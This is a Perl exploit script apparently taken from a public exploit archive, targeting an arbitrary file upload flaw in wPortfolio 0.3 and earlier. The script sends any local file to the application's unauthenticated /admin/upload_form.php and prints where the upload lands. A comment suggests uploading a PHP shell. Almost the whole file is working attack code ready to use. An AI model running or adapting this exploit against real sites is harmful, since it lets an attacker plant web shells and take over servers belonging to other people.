#!/usr/bin/perl

# Name: wPortfolio <= 0.3 Arbitrary File Upload Exploit
# Script Name: wPortfolio 0.3
# Download: http://sourceforge.net/project/downloading.php?group_id=244834&use_mirror=kent&filename=wPortfolio.zip&80791070
# Vulnerability: Arbitrary File Upload
# Vulnerable page: /admin/upload_form.php
# * You can upload everything you want, why not a php shell? ^^
# Author: Osirys
# Contact: osirys[at]live[dot]it
# Proud to be Italian 
# Thx: athos

use LWP::UserAgent;
use HTTP::Request::Common;

my $path        = "/admin/upload_form.php";
my $d_fold      = "/admin/tmp/"; 
my($host,$file) = ($ARGV[0],$ARGV[1]);

($host,$file) || help("-1");
cheek($host) == 1 || help("-2");
&banner;
my $url = $host.$path;

my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url,
                      Content_Type => 'form-data',
                      Content      => [file_to_upload => [$file]] 
                      );

if ($re->is_success) {
    print "[+] Uploaded ! \n";
    print "[+] Link: ".$host.$d_fold.$file." \n";
}
else {
    print "[-] Upload failed ! \n";
}

sub cheek() {
    my $host = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
}

sub banner {
    print "\n".
          "  ========================================== \n".
          "     wPortfolio 0.3 Arbitrary File Upload \n".
          "     Author: Osirys \n".
          "     osirys[at]live[dot]it \n".
          "     Proud to be italian \n".
          "  ========================================== \n\n";
}

sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Cheek that you typed the hostname address and the local file to upload !\n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path local_file_to_upload \n\n";
    exit(0);
}